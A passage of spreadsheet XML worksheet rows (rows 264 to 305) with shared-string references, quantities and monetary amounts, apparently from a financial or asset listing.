      <c r="J264" s="126">
        <v>1030390</v>
      </c>
      <c r="K264" s="99">
        <v>0</v>
      </c>
      <c r="L264" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="265" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A265" s="93"/>
      <c r="B265" s="88">
        <v>259</v>
      </c>
      <c r="C265" s="237" t="s">
        <v>3381</v>
      </c>
      <c r="D265" s="238" t="s">
        <v>3382</v>
      </c>
      <c r="E265" s="238" t="s">
        <v>3383</v>
      </c>
      <c r="F265" s="9"/>
      <c r="G265" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H265" s="11">
        <v>1</v>
      </c>
      <c r="I265" s="238" t="s">
        <v>3377</v>
      </c>
      <c r="J265" s="126">
        <v>11000</v>
      </c>
      <c r="K265" s="99">
        <v>97440</v>
      </c>
      <c r="L265" s="238" t="s">
        <v>3384</v>
      </c>
    </row>
    <row r="266" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A266" s="93"/>
      <c r="B266" s="88">
        <v>260</v>
      </c>
      <c r="C266" s="237" t="s">
        <v>3385</v>
      </c>
      <c r="D266" s="238" t="s">
        <v>835</v>
      </c>
      <c r="E266" s="238" t="s">
        <v>755</v>
      </c>
      <c r="F266" s="9"/>
      <c r="G266" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H266" s="11">
        <v>2</v>
      </c>
      <c r="I266" s="238" t="s">
        <v>3377</v>
      </c>
      <c r="J266" s="126">
        <v>232000</v>
      </c>
      <c r="K266" s="99">
        <v>0</v>
      </c>
      <c r="L266" s="238" t="s">
        <v>3384</v>
      </c>
    </row>
    <row r="267" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A267" s="93"/>
      <c r="B267" s="88">
        <v>261</v>
      </c>
      <c r="C267" s="237" t="s">
        <v>3386</v>
      </c>
      <c r="D267" s="238" t="s">
        <v>3387</v>
      </c>
      <c r="E267" s="238" t="s">
        <v>3388</v>
      </c>
      <c r="F267" s="9"/>
      <c r="G267" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H267" s="11">
        <v>2</v>
      </c>
      <c r="I267" s="238" t="s">
        <v>3377</v>
      </c>
      <c r="J267" s="126">
        <v>570000</v>
      </c>
      <c r="K267" s="99">
        <v>0</v>
      </c>
      <c r="L267" s="238" t="s">
        <v>3384</v>
      </c>
    </row>
    <row r="268" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A268" s="93"/>
      <c r="B268" s="88">
        <v>262</v>
      </c>
      <c r="C268" s="237" t="s">
        <v>3389</v>
      </c>
      <c r="D268" s="238" t="s">
        <v>3387</v>
      </c>
      <c r="E268" s="10"/>
      <c r="F268" s="9"/>
      <c r="G268" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H268" s="11">
        <v>1</v>
      </c>
      <c r="I268" s="238" t="s">
        <v>3390</v>
      </c>
      <c r="J268" s="126">
        <v>5427.35</v>
      </c>
      <c r="K268" s="99">
        <v>0</v>
      </c>
      <c r="L268" s="10"/>
    </row>
    <row r="269" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A269" s="93"/>
      <c r="B269" s="88">
        <v>263</v>
      </c>
      <c r="C269" s="237" t="s">
        <v>3391</v>
      </c>
      <c r="D269" s="238" t="s">
        <v>3392</v>
      </c>
      <c r="E269" s="238" t="s">
        <v>3393</v>
      </c>
      <c r="F269" s="9"/>
      <c r="G269" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H269" s="11">
        <v>1</v>
      </c>
      <c r="I269" s="238" t="s">
        <v>1222</v>
      </c>
      <c r="J269" s="126">
        <v>2592471.8</v>
      </c>
      <c r="K269" s="99">
        <v>0</v>
      </c>
      <c r="L269" s="238" t="s">
        <v>3394</v>
      </c>
    </row>
    <row r="270" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A270" s="93"/>
      <c r="B270" s="88">
        <v>264</v>
      </c>
      <c r="C270" s="237" t="s">
        <v>3395</v>
      </c>
      <c r="D270" s="238" t="s">
        <v>3396</v>
      </c>
      <c r="E270" s="238" t="s">
        <v>3380</v>
      </c>
      <c r="F270" s="9"/>
      <c r="G270" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H270" s="11">
        <v>1</v>
      </c>
      <c r="I270" s="238" t="s">
        <v>3397</v>
      </c>
      <c r="J270" s="126">
        <v>247863.24</v>
      </c>
      <c r="K270" s="99">
        <v>55507.2</v>
      </c>
      <c r="L270" s="238" t="s">
        <v>3398</v>
      </c>
    </row>
    <row r="271" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A271" s="93"/>
      <c r="B271" s="88">
        <v>265</v>
      </c>
      <c r="C271" s="237" t="s">
        <v>3399</v>
      </c>
      <c r="D271" s="238" t="s">
        <v>3400</v>
      </c>
      <c r="E271" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="F271" s="9"/>
      <c r="G271" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H271" s="11">
        <v>1</v>
      </c>
      <c r="I271" s="238" t="s">
        <v>3397</v>
      </c>
      <c r="J271" s="126">
        <v>12820.51</v>
      </c>
      <c r="K271" s="99">
        <v>2867.2</v>
      </c>
      <c r="L271" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="272" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A272" s="93"/>
      <c r="B272" s="88">
        <v>266</v>
      </c>
      <c r="C272" s="237" t="s">
        <v>3401</v>
      </c>
      <c r="D272" s="238" t="s">
        <v>3402</v>
      </c>
      <c r="E272" s="238" t="s">
        <v>714</v>
      </c>
      <c r="F272" s="9"/>
      <c r="G272" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H272" s="11">
        <v>1</v>
      </c>
      <c r="I272" s="238" t="s">
        <v>3397</v>
      </c>
      <c r="J272" s="126">
        <v>12820.51</v>
      </c>
      <c r="K272" s="99">
        <v>0</v>
      </c>
      <c r="L272" s="238" t="s">
        <v>3403</v>
      </c>
    </row>
    <row r="273" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A273" s="93"/>
      <c r="B273" s="88">
        <v>267</v>
      </c>
      <c r="C273" s="237" t="s">
        <v>3404</v>
      </c>
      <c r="D273" s="238" t="s">
        <v>3405</v>
      </c>
      <c r="E273" s="238" t="s">
        <v>3406</v>
      </c>
      <c r="F273" s="9"/>
      <c r="G273" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H273" s="11">
        <v>1</v>
      </c>
      <c r="I273" s="238" t="s">
        <v>3407</v>
      </c>
      <c r="J273" s="126">
        <v>165000</v>
      </c>
      <c r="K273" s="99">
        <v>60720</v>
      </c>
      <c r="L273" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="274" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A274" s="93"/>
      <c r="B274" s="88">
        <v>268</v>
      </c>
      <c r="C274" s="237" t="s">
        <v>3408</v>
      </c>
      <c r="D274" s="238" t="s">
        <v>3023</v>
      </c>
      <c r="E274" s="238" t="s">
        <v>3409</v>
      </c>
      <c r="F274" s="9"/>
      <c r="G274" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H274" s="11">
        <v>1</v>
      </c>
      <c r="I274" s="238" t="s">
        <v>995</v>
      </c>
      <c r="J274" s="126">
        <v>46581.2</v>
      </c>
      <c r="K274" s="99">
        <v>0</v>
      </c>
      <c r="L274" s="10"/>
    </row>
    <row r="275" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A275" s="93"/>
      <c r="B275" s="88">
        <v>269</v>
      </c>
      <c r="C275" s="237" t="s">
        <v>3410</v>
      </c>
      <c r="D275" s="238" t="s">
        <v>3411</v>
      </c>
      <c r="E275" s="238" t="s">
        <v>3251</v>
      </c>
      <c r="F275" s="9"/>
      <c r="G275" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H275" s="11">
        <v>2</v>
      </c>
      <c r="I275" s="238" t="s">
        <v>995</v>
      </c>
      <c r="J275" s="126">
        <v>3931.62</v>
      </c>
      <c r="K275" s="99">
        <v>873.6</v>
      </c>
      <c r="L275" s="10"/>
    </row>
    <row r="276" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A276" s="93"/>
      <c r="B276" s="88">
        <v>270</v>
      </c>
      <c r="C276" s="237" t="s">
        <v>3412</v>
      </c>
      <c r="D276" s="238" t="s">
        <v>3238</v>
      </c>
      <c r="E276" s="238" t="s">
        <v>3413</v>
      </c>
      <c r="F276" s="9"/>
      <c r="G276" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H276" s="11">
        <v>1</v>
      </c>
      <c r="I276" s="238" t="s">
        <v>3085</v>
      </c>
      <c r="J276" s="126">
        <v>2051.28</v>
      </c>
      <c r="K276" s="99">
        <v>787.2</v>
      </c>
      <c r="L276" s="238" t="s">
        <v>3086</v>
      </c>
    </row>
    <row r="277" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A277" s="93"/>
      <c r="B277" s="88">
        <v>271</v>
      </c>
      <c r="C277" s="237" t="s">
        <v>3414</v>
      </c>
      <c r="D277" s="238" t="s">
        <v>3415</v>
      </c>
      <c r="E277" s="238" t="s">
        <v>3416</v>
      </c>
      <c r="F277" s="9"/>
      <c r="G277" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H277" s="11">
        <v>1</v>
      </c>
      <c r="I277" s="238" t="s">
        <v>478</v>
      </c>
      <c r="J277" s="126">
        <v>400352.53</v>
      </c>
      <c r="K277" s="99">
        <v>137600</v>
      </c>
      <c r="L277" s="238" t="s">
        <v>3417</v>
      </c>
    </row>
    <row r="278" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A278" s="93"/>
      <c r="B278" s="88">
        <v>272</v>
      </c>
      <c r="C278" s="237" t="s">
        <v>3418</v>
      </c>
      <c r="D278" s="238" t="s">
        <v>3419</v>
      </c>
      <c r="E278" s="238" t="s">
        <v>3420</v>
      </c>
      <c r="F278" s="9"/>
      <c r="G278" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H278" s="11">
        <v>3</v>
      </c>
      <c r="I278" s="238" t="s">
        <v>478</v>
      </c>
      <c r="J278" s="126">
        <v>1914824.55</v>
      </c>
      <c r="K278" s="99">
        <v>658691.2</v>
      </c>
      <c r="L278" s="238" t="s">
        <v>3421</v>
      </c>
    </row>
    <row r="279" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A279" s="93"/>
      <c r="B279" s="88">
        <v>273</v>
      </c>
      <c r="C279" s="237" t="s">
        <v>3422</v>
      </c>
      <c r="D279" s="238" t="s">
        <v>3233</v>
      </c>
      <c r="E279" s="238" t="s">
        <v>3423</v>
      </c>
      <c r="F279" s="9"/>
      <c r="G279" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H279" s="11">
        <v>2</v>
      </c>
      <c r="I279" s="238" t="s">
        <v>478</v>
      </c>
      <c r="J279" s="126">
        <v>63191.45</v>
      </c>
      <c r="K279" s="99">
        <v>0</v>
      </c>
      <c r="L279" s="238" t="s">
        <v>3424</v>
      </c>
    </row>
    <row r="280" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A280" s="93"/>
      <c r="B280" s="88">
        <v>274</v>
      </c>
      <c r="C280" s="237" t="s">
        <v>3425</v>
      </c>
      <c r="D280" s="238" t="s">
        <v>3426</v>
      </c>
      <c r="E280" s="238" t="s">
        <v>3427</v>
      </c>
      <c r="F280" s="9"/>
      <c r="G280" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H280" s="11">
        <v>2</v>
      </c>
      <c r="I280" s="238" t="s">
        <v>478</v>
      </c>
      <c r="J280" s="126">
        <v>212022.22</v>
      </c>
      <c r="K280" s="99">
        <v>0</v>
      </c>
      <c r="L280" s="238" t="s">
        <v>3424</v>
      </c>
    </row>
    <row r="281" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A281" s="93"/>
      <c r="B281" s="88">
        <v>275</v>
      </c>
      <c r="C281" s="237" t="s">
        <v>3428</v>
      </c>
      <c r="D281" s="238" t="s">
        <v>3429</v>
      </c>
      <c r="E281" s="238" t="s">
        <v>3430</v>
      </c>
      <c r="F281" s="9"/>
      <c r="G281" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H281" s="11">
        <v>3</v>
      </c>
      <c r="I281" s="238" t="s">
        <v>478</v>
      </c>
      <c r="J281" s="126">
        <v>15384.62</v>
      </c>
      <c r="K281" s="99">
        <v>3427.2</v>
      </c>
      <c r="L281" s="238" t="s">
        <v>3424</v>
      </c>
    </row>
    <row r="282" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A282" s="93"/>
      <c r="B282" s="88">
        <v>276</v>
      </c>
      <c r="C282" s="237" t="s">
        <v>3431</v>
      </c>
      <c r="D282" s="238" t="s">
        <v>3432</v>
      </c>
      <c r="E282" s="238" t="s">
        <v>3433</v>
      </c>
      <c r="F282" s="9"/>
      <c r="G282" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H282" s="11">
        <v>3</v>
      </c>
      <c r="I282" s="238" t="s">
        <v>478</v>
      </c>
      <c r="J282" s="126">
        <v>41025.64</v>
      </c>
      <c r="K282" s="99">
        <v>9184</v>
      </c>
      <c r="L282" s="238" t="s">
        <v>3424</v>
      </c>
    </row>
    <row r="283" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A283" s="93"/>
      <c r="B283" s="88">
        <v>277</v>
      </c>
      <c r="C283" s="237" t="s">
        <v>3434</v>
      </c>
      <c r="D283" s="238" t="s">
        <v>3435</v>
      </c>
      <c r="E283" s="238" t="s">
        <v>3436</v>
      </c>
      <c r="F283" s="9"/>
      <c r="G283" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H283" s="11">
        <v>1</v>
      </c>
      <c r="I283" s="238" t="s">
        <v>3437</v>
      </c>
      <c r="J283" s="126">
        <v>4641.03</v>
      </c>
      <c r="K283" s="99">
        <v>1582.4</v>
      </c>
      <c r="L283" s="10"/>
    </row>
    <row r="284" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A284" s="93"/>
      <c r="B284" s="88">
        <v>278</v>
      </c>
      <c r="C284" s="237" t="s">
        <v>3438</v>
      </c>
      <c r="D284" s="238" t="s">
        <v>3439</v>
      </c>
      <c r="E284" s="238" t="s">
        <v>3440</v>
      </c>
      <c r="F284" s="9"/>
      <c r="G284" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H284" s="11">
        <v>1</v>
      </c>
      <c r="I284" s="238" t="s">
        <v>3441</v>
      </c>
      <c r="J284" s="14">
        <v>850</v>
      </c>
      <c r="K284" s="99">
        <v>0</v>
      </c>
      <c r="L284" s="238" t="s">
        <v>3442</v>
      </c>
    </row>
    <row r="285" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A285" s="93"/>
      <c r="B285" s="88">
        <v>279</v>
      </c>
      <c r="C285" s="237" t="s">
        <v>3443</v>
      </c>
      <c r="D285" s="238" t="s">
        <v>3008</v>
      </c>
      <c r="E285" s="238" t="s">
        <v>3444</v>
      </c>
      <c r="F285" s="9"/>
      <c r="G285" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H285" s="11">
        <v>1</v>
      </c>
      <c r="I285" s="238" t="s">
        <v>3441</v>
      </c>
      <c r="J285" s="126">
        <v>7119765.6</v>
      </c>
      <c r="K285" s="99">
        <v>2449176.8</v>
      </c>
      <c r="L285" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="286" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A286" s="93"/>
      <c r="B286" s="88">
        <v>280</v>
      </c>
      <c r="C286" s="237" t="s">
        <v>3445</v>
      </c>
      <c r="D286" s="238" t="s">
        <v>824</v>
      </c>
      <c r="E286" s="10"/>
      <c r="F286" s="9"/>
      <c r="G286" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H286" s="11">
        <v>4</v>
      </c>
      <c r="I286" s="238" t="s">
        <v>432</v>
      </c>
      <c r="J286" s="126">
        <v>27350.43</v>
      </c>
      <c r="K286" s="99">
        <v>9391.2</v>
      </c>
      <c r="L286" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="287" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A287" s="93"/>
      <c r="B287" s="88">
        <v>281</v>
      </c>
      <c r="C287" s="237" t="s">
        <v>3446</v>
      </c>
      <c r="D287" s="238" t="s">
        <v>3447</v>
      </c>
      <c r="E287" s="238" t="s">
        <v>3448</v>
      </c>
      <c r="F287" s="9"/>
      <c r="G287" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H287" s="11">
        <v>1</v>
      </c>
      <c r="I287" s="238" t="s">
        <v>432</v>
      </c>
      <c r="J287" s="126">
        <v>5128.21</v>
      </c>
      <c r="K287" s="99">
        <v>0</v>
      </c>
      <c r="L287" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="288" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A288" s="93"/>
      <c r="B288" s="88">
        <v>282</v>
      </c>
      <c r="C288" s="237" t="s">
        <v>3449</v>
      </c>
      <c r="D288" s="238" t="s">
        <v>222</v>
      </c>
      <c r="E288" s="238" t="s">
        <v>3450</v>
      </c>
      <c r="F288" s="9"/>
      <c r="G288" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H288" s="11">
        <v>1</v>
      </c>
      <c r="I288" s="238" t="s">
        <v>432</v>
      </c>
      <c r="J288" s="126">
        <v>2478.63</v>
      </c>
      <c r="K288" s="99">
        <v>553.28</v>
      </c>
      <c r="L288" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="289" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A289" s="93"/>
      <c r="B289" s="88">
        <v>283</v>
      </c>
      <c r="C289" s="237" t="s">
        <v>3451</v>
      </c>
      <c r="D289" s="238" t="s">
        <v>3452</v>
      </c>
      <c r="E289" s="238" t="s">
        <v>3453</v>
      </c>
      <c r="F289" s="9"/>
      <c r="G289" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H289" s="11">
        <v>1</v>
      </c>
      <c r="I289" s="238" t="s">
        <v>432</v>
      </c>
      <c r="J289" s="126">
        <v>16726.5</v>
      </c>
      <c r="K289" s="99">
        <v>5744.8</v>
      </c>
      <c r="L289" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="290" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A290" s="93"/>
      <c r="B290" s="88">
        <v>284</v>
      </c>
      <c r="C290" s="237" t="s">
        <v>3454</v>
      </c>
      <c r="D290" s="238" t="s">
        <v>3455</v>
      </c>
      <c r="E290" s="10"/>
      <c r="F290" s="9"/>
      <c r="G290" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H290" s="11">
        <v>1</v>
      </c>
      <c r="I290" s="238" t="s">
        <v>3456</v>
      </c>
      <c r="J290" s="126">
        <v>8109382.49</v>
      </c>
      <c r="K290" s="99">
        <v>1816483.2</v>
      </c>
      <c r="L290" s="238" t="s">
        <v>3403</v>
      </c>
    </row>
    <row r="291" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A291" s="93"/>
      <c r="B291" s="88">
        <v>285</v>
      </c>
      <c r="C291" s="237" t="s">
        <v>3457</v>
      </c>
      <c r="D291" s="238" t="s">
        <v>1092</v>
      </c>
      <c r="E291" s="238" t="s">
        <v>3458</v>
      </c>
      <c r="F291" s="9"/>
      <c r="G291" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H291" s="11">
        <v>1</v>
      </c>
      <c r="I291" s="238" t="s">
        <v>1331</v>
      </c>
      <c r="J291" s="126">
        <v>4273.5</v>
      </c>
      <c r="K291" s="99">
        <v>0</v>
      </c>
      <c r="L291" s="238" t="s">
        <v>3459</v>
      </c>
    </row>
    <row r="292" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A292" s="93"/>
      <c r="B292" s="88">
        <v>286</v>
      </c>
      <c r="C292" s="237" t="s">
        <v>3460</v>
      </c>
      <c r="D292" s="238" t="s">
        <v>3415</v>
      </c>
      <c r="E292" s="238" t="s">
        <v>3461</v>
      </c>
      <c r="F292" s="9"/>
      <c r="G292" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H292" s="11">
        <v>1</v>
      </c>
      <c r="I292" s="238" t="s">
        <v>1331</v>
      </c>
      <c r="J292" s="126">
        <v>514957.26</v>
      </c>
      <c r="K292" s="99">
        <v>197721.6</v>
      </c>
      <c r="L292" s="238" t="s">
        <v>3462</v>
      </c>
    </row>
    <row r="293" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A293" s="93"/>
      <c r="B293" s="88">
        <v>287</v>
      </c>
      <c r="C293" s="237" t="s">
        <v>3463</v>
      </c>
      <c r="D293" s="238" t="s">
        <v>3464</v>
      </c>
      <c r="E293" s="238" t="s">
        <v>3465</v>
      </c>
      <c r="F293" s="9"/>
      <c r="G293" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H293" s="11">
        <v>2</v>
      </c>
      <c r="I293" s="238" t="s">
        <v>1331</v>
      </c>
      <c r="J293" s="126">
        <v>94017.1</v>
      </c>
      <c r="K293" s="99">
        <v>36096</v>
      </c>
      <c r="L293" s="238" t="s">
        <v>3466</v>
      </c>
    </row>
    <row r="294" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A294" s="93"/>
      <c r="B294" s="88">
        <v>288</v>
      </c>
      <c r="C294" s="237" t="s">
        <v>3467</v>
      </c>
      <c r="D294" s="238" t="s">
        <v>952</v>
      </c>
      <c r="E294" s="238" t="s">
        <v>3468</v>
      </c>
      <c r="F294" s="9"/>
      <c r="G294" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H294" s="11">
        <v>1</v>
      </c>
      <c r="I294" s="238" t="s">
        <v>447</v>
      </c>
      <c r="J294" s="126">
        <v>364446.15</v>
      </c>
      <c r="K294" s="99">
        <v>139929.6</v>
      </c>
      <c r="L294" s="238" t="s">
        <v>3469</v>
      </c>
    </row>
    <row r="295" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A295" s="93"/>
      <c r="B295" s="88">
        <v>289</v>
      </c>
      <c r="C295" s="237" t="s">
        <v>3470</v>
      </c>
      <c r="D295" s="238" t="s">
        <v>3471</v>
      </c>
      <c r="E295" s="238" t="s">
        <v>3472</v>
      </c>
      <c r="F295" s="9"/>
      <c r="G295" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H295" s="11">
        <v>1</v>
      </c>
      <c r="I295" s="238" t="s">
        <v>1634</v>
      </c>
      <c r="J295" s="126">
        <v>639965.82</v>
      </c>
      <c r="K295" s="99">
        <v>245721.6</v>
      </c>
      <c r="L295" s="238" t="s">
        <v>3473</v>
      </c>
    </row>
    <row r="296" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A296" s="93"/>
      <c r="B296" s="88">
        <v>290</v>
      </c>
      <c r="C296" s="237" t="s">
        <v>3474</v>
      </c>
      <c r="D296" s="238" t="s">
        <v>3475</v>
      </c>
      <c r="E296" s="238" t="s">
        <v>3476</v>
      </c>
      <c r="F296" s="9"/>
      <c r="G296" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H296" s="11">
        <v>1</v>
      </c>
      <c r="I296" s="238" t="s">
        <v>773</v>
      </c>
      <c r="J296" s="126">
        <v>150000</v>
      </c>
      <c r="K296" s="99">
        <v>31200</v>
      </c>
      <c r="L296" s="238" t="s">
        <v>3477</v>
      </c>
    </row>
    <row r="297" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A297" s="93"/>
      <c r="B297" s="88">
        <v>291</v>
      </c>
      <c r="C297" s="237" t="s">
        <v>3478</v>
      </c>
      <c r="D297" s="238" t="s">
        <v>3001</v>
      </c>
      <c r="E297" s="238" t="s">
        <v>3479</v>
      </c>
      <c r="F297" s="9"/>
      <c r="G297" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H297" s="11">
        <v>2</v>
      </c>
      <c r="I297" s="238" t="s">
        <v>773</v>
      </c>
      <c r="J297" s="126">
        <v>101111.11</v>
      </c>
      <c r="K297" s="99">
        <v>0</v>
      </c>
      <c r="L297" s="238" t="s">
        <v>3480</v>
      </c>
    </row>
    <row r="298" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A298" s="93"/>
      <c r="B298" s="88">
        <v>292</v>
      </c>
      <c r="C298" s="237" t="s">
        <v>3481</v>
      </c>
      <c r="D298" s="238" t="s">
        <v>3482</v>
      </c>
      <c r="E298" s="238" t="s">
        <v>3483</v>
      </c>
      <c r="F298" s="9"/>
      <c r="G298" s="88" t="s">
        <v>3484</v>
      </c>
      <c r="H298" s="11">
        <v>1</v>
      </c>
      <c r="I298" s="238" t="s">
        <v>1417</v>
      </c>
      <c r="J298" s="126">
        <v>190470.09</v>
      </c>
      <c r="K298" s="99">
        <v>73113.6</v>
      </c>
      <c r="L298" s="238" t="s">
        <v>3485</v>
      </c>
    </row>
    <row r="299" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A299" s="93"/>
      <c r="B299" s="88">
        <v>293</v>
      </c>
      <c r="C299" s="237" t="s">
        <v>3486</v>
      </c>
      <c r="D299" s="238" t="s">
        <v>3487</v>
      </c>
      <c r="E299" s="238" t="s">
        <v>3488</v>
      </c>
      <c r="F299" s="9"/>
      <c r="G299" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H299" s="11">
        <v>1</v>
      </c>
      <c r="I299" s="238" t="s">
        <v>1417</v>
      </c>
      <c r="J299" s="126">
        <v>132478.64</v>
      </c>
      <c r="K299" s="99">
        <v>50841.6</v>
      </c>
      <c r="L299" s="238" t="s">
        <v>3489</v>
      </c>
    </row>
    <row r="300" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A300" s="93"/>
      <c r="B300" s="88">
        <v>294</v>
      </c>
      <c r="C300" s="237" t="s">
        <v>3490</v>
      </c>
      <c r="D300" s="238" t="s">
        <v>3482</v>
      </c>
      <c r="E300" s="238" t="s">
        <v>3483</v>
      </c>
      <c r="F300" s="9"/>
      <c r="G300" s="88" t="s">
        <v>3484</v>
      </c>
      <c r="H300" s="11">
        <v>1</v>
      </c>
      <c r="I300" s="238" t="s">
        <v>1417</v>
      </c>
      <c r="J300" s="126">
        <v>191765.87</v>
      </c>
      <c r="K300" s="99">
        <v>73612.8</v>
      </c>
      <c r="L300" s="238" t="s">
        <v>3491</v>
      </c>
    </row>
    <row r="301" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A301" s="93"/>
      <c r="B301" s="88">
        <v>295</v>
      </c>
      <c r="C301" s="237" t="s">
        <v>3492</v>
      </c>
      <c r="D301" s="238" t="s">
        <v>3493</v>
      </c>
      <c r="E301" s="238" t="s">
        <v>3494</v>
      </c>
      <c r="F301" s="9"/>
      <c r="G301" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H301" s="11">
        <v>2</v>
      </c>
      <c r="I301" s="238" t="s">
        <v>1417</v>
      </c>
      <c r="J301" s="126">
        <v>862602.16</v>
      </c>
      <c r="K301" s="99">
        <v>179420.8</v>
      </c>
      <c r="L301" s="238" t="s">
        <v>3495</v>
      </c>
    </row>
    <row r="302" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A302" s="93"/>
      <c r="B302" s="88">
        <v>296</v>
      </c>
      <c r="C302" s="237" t="s">
        <v>3496</v>
      </c>
      <c r="D302" s="238" t="s">
        <v>3008</v>
      </c>
      <c r="E302" s="238" t="s">
        <v>3444</v>
      </c>
      <c r="F302" s="9"/>
      <c r="G302" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H302" s="11">
        <v>1</v>
      </c>
      <c r="I302" s="238" t="s">
        <v>1417</v>
      </c>
      <c r="J302" s="126">
        <v>6857789.28</v>
      </c>
      <c r="K302" s="99">
        <v>2633356.8</v>
      </c>
      <c r="L302" s="238" t="s">
        <v>3497</v>
      </c>
    </row>
    <row r="303" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A303" s="93"/>
      <c r="B303" s="88">
        <v>297</v>
      </c>
      <c r="C303" s="237" t="s">
        <v>3498</v>
      </c>
      <c r="D303" s="238" t="s">
        <v>2440</v>
      </c>
      <c r="E303" s="238" t="s">
        <v>3499</v>
      </c>
      <c r="F303" s="9"/>
      <c r="G303" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H303" s="11">
        <v>1</v>
      </c>
      <c r="I303" s="238" t="s">
        <v>3500</v>
      </c>
      <c r="J303" s="126">
        <v>7094.02</v>
      </c>
      <c r="K303" s="99">
        <v>1985.2</v>
      </c>
      <c r="L303" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="304" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A304" s="93"/>
      <c r="B304" s="88">
        <v>298</v>
      </c>
      <c r="C304" s="237" t="s">
        <v>3501</v>
      </c>
      <c r="D304" s="238" t="s">
        <v>3502</v>
      </c>
      <c r="E304" s="238" t="s">
        <v>3503</v>
      </c>
      <c r="F304" s="9"/>
      <c r="G304" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H304" s="11">
        <v>1</v>
      </c>
      <c r="I304" s="238" t="s">
        <v>3500</v>
      </c>
      <c r="J304" s="126">
        <v>1568.38</v>
      </c>
      <c r="K304" s="99">
        <v>436.8</v>
      </c>
      <c r="L304" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="305" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A305" s="93"/>
      <c r="B305" s="88">
        <v>299</v>
      </c>
      <c r="C305" s="237" t="s">
        <v>3504</v>
      </c>
      <c r="D305" s="238" t="s">
        <v>3482</v>
      </c>
      <c r="E305" s="238" t="s">
        <v>3505</v>
      </c>
